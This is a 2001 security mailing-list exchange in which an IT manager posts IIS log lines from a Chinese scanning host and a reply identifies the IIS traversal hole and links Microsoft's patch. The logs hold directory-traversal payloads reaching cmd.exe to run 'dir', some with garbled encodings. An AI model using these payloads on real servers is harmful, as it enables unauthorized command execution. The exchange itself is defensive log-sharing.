[Dshield] Check this out.

Stephen Carr scarr at BASTYR.EDU
Tue Aug 21 15:28:18 GMT 2001


This is another known security hole in IIS that Microsoft put a patch out
for in May some time. This was one of the earlier Chinese hack attempts. Not
as bad as the recent CR stuff because it isn't a worm so it doesn't
multiply. Mostly what this hack does is give the hacker the ability to run a
command prompt with some system rights (not Admin rights). This was
primarily used to change some files around (usually the default web page).
Back in early June this showed up in my IIS logs at least once a day. The
patch is available at
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Monday, August 20, 2001 5:30 AM
To: 'Dshield (E-mail)
Subject: [Dshield] Check this out.


This is a welcoming log entree on a Monday Morning.  Anybody else get any of
these babies over the weekend?  It's from CHINANET Shandong province
network.

2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:48 61.156.28.14 - GET
/scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..À%9v../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:51 61.156.28.14 - GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:51 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:51 61.156.28.14 - GET /scripts/..o../winnt/system32/cmd.exe
/c+dir 401 80 - - -
2001-08-19 17:41:53 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:53 61.156.28.14 - GET
/scripts/..ðEUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:53 61.156.28.14 - GET
/scripts/..øEUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:54 61.156.28.14 - GET
/scripts/..üEUREUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:54 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -

Paul M. Marsh
IT Manager
Nellie Mae Education Foundation
Tel. #  781-348-4235
Pager 877-372-1927

www.nmefdn.org

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield




More information about the list mailing list